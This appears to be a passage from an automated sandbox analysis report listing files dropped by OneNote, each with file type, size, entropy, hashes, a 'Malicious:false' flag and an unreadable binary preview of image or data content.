                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.647546800973827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RaaYzVYyfB3h1RRXUnfokz1ghllfFFBl/FKYyBPRujlw//0lweI/8o9Rujd:RaThYyf9/Ufoe+hXFFBtKIWf/Rg
                                                                                                                                                                                                              MD5:8D4531AD5EA1DEAF790693AF976FE126
                                                                                                                                                                                                              SHA1:F56D9139030F0ECE8030958BF04CA5EDE55FC4BC
                                                                                                                                                                                                              SHA-256:ABB461899351013982237F1B64C1DAED208C2C10897A353E74E1F5A9D87A4FC9
                                                                                                                                                                                                              SHA-512:6A21DECE3EC09928F2DC6579B6C21BC4B818A46121D50D09F40D03D01931F9B3688F687A4ADC1BA5827F2F5424BAEE20C4906506355F3DAC65374A861C6148A8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_x...M.B..'r.1.t................?.....I...............................................................................................................h............................................L..f.N.-;.q........... W8.!UN...................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84097
                                                                                                                                                                                                              Entropy (8bit):7.78862495530604
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                                                                                              MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                                                                                              SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                                                                                              SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                                                                                              SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65589
                                                                                                                                                                                                              Entropy (8bit):7.960181939300061
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                                                                                              MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                                                                                              SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                                                                                              SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                                                                                              SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):60924
                                                                                                                                                                                                              Entropy (8bit):7.758472758205366
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                                                                                              MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                                                                                              SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                                                                                              SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                                                                                              SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34299
                                                                                                                                                                                                              Entropy (8bit):7.247541176493898
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                                                                                              MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                                                                                              SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                                                                                              SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                                                                                              SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                              Entropy (8bit):6.85024426015615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                                                                                              MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                                                                                              SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                                                                                              SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                                                                                              SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):52945
                                                                                                                                                                                                              Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                              MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                              SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                              SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                              SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6372278996620918
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Ra56LIDXFYyfB3h1RRXUnfOXllK6r4Xl9FFBl/FKBfodUBRujlw//0lweI/ZUjR0:Ra5lYyf9/UfOXlkA419FFBtmg+2Wf/qq
                                                                                                                                                                                                              MD5:B5404F4EF533CCD2B3A650C213C7FF3B
                                                                                                                                                                                                              SHA1:71F4C068BBEED13348C75CE04510D75F6BEE3D36
                                                                                                                                                                                                              SHA-256:D81712EF53649CB55279D4CFCC3A195860FC1029628E4CF6DD489D088272044E
                                                                                                                                                                                                              SHA-512:C454477377610C7A3CC2994F42B67513BC36B9C1EE9F75F505E1B649041DFFFCDB9C96A33DD1946338755F767DAAFFA49A32195CDEDF544181DA36E0B3306CD7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_F(_.k.-@....?&..................?.....I...............................................................................................................h...........................................$w:r...A....g.H...........V5>.N..zJ.w............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3361
                                                                                                                                                                                                              Entropy (8bit):7.619405839796034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                                                                                              MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                                                                                              SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                                                                                              SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                                                                                              SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):59832
                                                                                                                                                                                                              Entropy (8bit):7.308211468398169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                              MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                              SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                              SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                              SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11043
                                                                                                                                                                                                              Entropy (8bit):7.96811228801767
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                                                                                              MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                                                                                              SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                                                                                              SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                                                                                              SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53259
                                                                                                                                                                                                              Entropy (8bit):7.651662052139301
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                              MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                              SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                              SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                              SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6493227903139199
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:RaKJeBYyfB3h1RRXUnf6wcFlNFFBl/FKtB/FrRujlw//0lweI/iEFxRujd:RaKmYyf9/UftcFXFFBtoB/FUWf/iEF8
                                                                                                                                                                                                              MD5:F01A670E9A893F72BE1C2D6672E42272
                                                                                                                                                                                                              SHA1:70B1CA85BA69946DBE5FF0AC6DF2B13E4509463C
                                                                                                                                                                                                              SHA-256:482FC725AA0CF74485A9D9E1EF4773613DF807F5BF0FCD4C45B7096E39E6BE08
                                                                                                                                                                                                              SHA-512:1AC6B58A273F13A7B90490E4FABC06BFD0D285D37C949E4E619B67EFD81EBE2117F2CA59AE2BFF4C29FF95E2F27E5A16E989CAE5C6BFB0B1771EE11EFB1CCC3D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_....~..A.y...~`.................?.....I...............................................................................................................h...............................................DE5@..'wV.S>...............B.`...3..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):64118
                                                                                                                                                                                                              Entropy (8bit):7.742974333356952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                                                                                              MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                                                                                              SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                                                                                              SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                                                                                              SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1547
                                                                                                                                                                                                              Entropy (8bit):6.4194805172468286
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                                                                                                                              MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                                                                                                                              SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                                                                                                                              SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                                                                                                                              SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6511682556389964
                                                                                                                                                                                                              Encrypted:false
